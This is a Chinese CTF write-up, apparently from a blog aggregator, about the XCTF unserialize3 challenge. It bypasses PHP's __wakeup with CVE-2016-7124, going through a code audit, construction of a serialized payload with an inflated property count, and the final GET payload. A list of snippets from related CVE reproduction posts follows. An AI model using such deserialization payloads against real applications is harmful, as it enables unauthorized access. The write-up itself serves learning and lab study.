代码编织梦想

我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!!

PHP反序列化漏洞

level3-[本地复现]-[CVE-2016-7124]

1.题目描述

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
} ?code=

2.代码审计

通读代码:

class xctf{					// 定义一个以xctf为名的类
public $flag = '111';		// 定义一个以flag为名的公有属性
public function __wakeup(){	// 定义一个公有的魔术方法__wakeup()
exit('bad requests');		// 若当前类的实例化对象被反序列化,则输出bad requests且直接退出脚本
} ?code=					// 提示我们传入一个?code的形式传参

分析所得:

  • 发现一:代码中有一对半花括号,很明显不完整;且这些代码是通过html的方式输出的,说明这只是后台php页面的核心代码的提示
  • 发现二:一旦触发wakeup魔术方法,就会立即输出bad requests且退出脚本,可能是在提示我们需要绕过该魔术方法,也就是使用CVE-2016-7124咯
  • 发现三:提示以GET形式传参给code
  • 猜测:可能只是在测试如何绕过wakeup魔术方法,绕过了应该就会给出flag

3.解题过程

第一步:分析流程

  • 实例化对象
  • 序列化对象
  • 修改序列化结果中的属性个数大于真实个数
  • 以GET形式把序列化结果提交给code

第二步:根据以上步骤构造payload

<?php
class xctf{
public $flag = '111';
} 

$chen = new xctf();
echo serialize($chen);
//修改前:O:4:"xctf":1:{s:4:"flag";s:3:"111";}
//修改后:O:4:"xctf":2:{s:4:"flag";s:3:"111";}

第三步:传入payload,读取flag

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PngVJbSP-1640522031179)(D:\☆学习\share\02OWASP-TOP10系统学习\A08-不安全的反序列化-PHP反序列化\images\09.png)]

4.总结

CVE-2016-7124的利用(PHP5 < 5.6.25、PHP7 < 7.0.10

linux解决cve-2011-0762漏洞vsftpd升级步骤_天涯起黄沙的博客-爱代码爱编程

Linux解决CVE-2011-0762漏洞vsftpd升级步骤 操作系统版本:RHEL 6.8 64位 vsftpd 升级到3.0.3 关闭服务  service vsftpd stop  service iptables stop  sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux

cve-2019-0708漏洞复现(附poc和靶机)_绅士v的博客-爱代码爱编程_2019-0708

验证漏洞: 在MSF目录下新建一个rdp_scanner.rb,复制以下代码并保存。 ## # This module requires Metasploit: https://metasploit.com/downloa

cve -2016-6663 mysql 本地提权-爱代码爱编程

0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x04漏洞利用过程总结给出了清晰的漏洞利用过程,结合poc食用效果更佳 # http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CV

CVE-2017-16995漏洞分析-爱代码爱编程

CVE-2017-16995特定内核提权漏洞分析 前言 这个漏洞于2017年12月21号Google Project Zero团队的Jann Horn发现并报告的,编号为CVE-2017-16995,然而在2018年4月再次被国外安全研究者Vitaly Nikolenko发现,并可以对特定内核版本的Ubuntu 16.04进行提权。 这个漏洞没有使用

XCTF-unserialize3-爱代码爱编程

0x01、Web 1.XCTF-unserialize3 第一步:开启环境 图略 第二步:访问题目链接,发现了一段php代码,如下所示 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-95BsdC0I-1605762236401)(C:\Users\Administrator\AppData\Roaming\Typo

漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273-爱代码爱编程

Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273 基础知识漏洞原理涉及版本漏洞复现CVE-2016-4977CVE-2017-4971CVE-2017-8046CVE-2018-1270CVE-2018-1273参考资料: 基础知识   S

CVE-2020-10977复现过程-爱代码爱编程

老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻

Spring Messaging 远程命令执行漏洞 CVE-2018-1270 漏洞复现-爱代码爱编程

Spring Messaging 远程命令执行漏洞(CVE-2018-1270) by ADummy 0x00利用路线 ​ 订阅的时候插入SpEL表达式—>向此订阅发送消息—>触发命令执行 0x01漏洞介绍 ​ STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,

VMware View Planner 远程代码执行漏洞复现分析(CVE-2021-21978)-爱代码爱编程

VMware View Planner 远程代码执行漏洞复现分析(CVE-2021-21978) 环境搭建漏洞分析漏洞复现参考文章 环境搭建 链接:https://pan.baidu.com/s/1Uw64KHr3hR553hz0a7xvrw 提取码:k3b0 双击使用vmware打开 提示输入账号密码,之后等待即可 使用刚才设置的账

java 漏洞复现_CVE-2019-12384漏洞分析及复现-爱代码爱编程

原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 引言 近期关于Jackson的RCE漏洞CVE-2019-12384爆出,关于漏洞的复现以及依赖,这里已经给出,笔者这边使用java的环境重新复现了一下,权当给各位看官当个翻译,

Gitlab任意文件读取漏洞(cve-2020-10977)-爱代码爱编程

Gitlab任意文件读取漏洞(cve-2020-10977) 简介: GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。 在Gitlab 8.5-12.9版本中,存在一

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现-爱代码爱编程

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现 一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCE

2.level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]-爱代码爱编程

我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 PHP反序列化漏洞level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level2-[本地复现]-[越过wakeup]-[CVE-2016-7124] 1.题目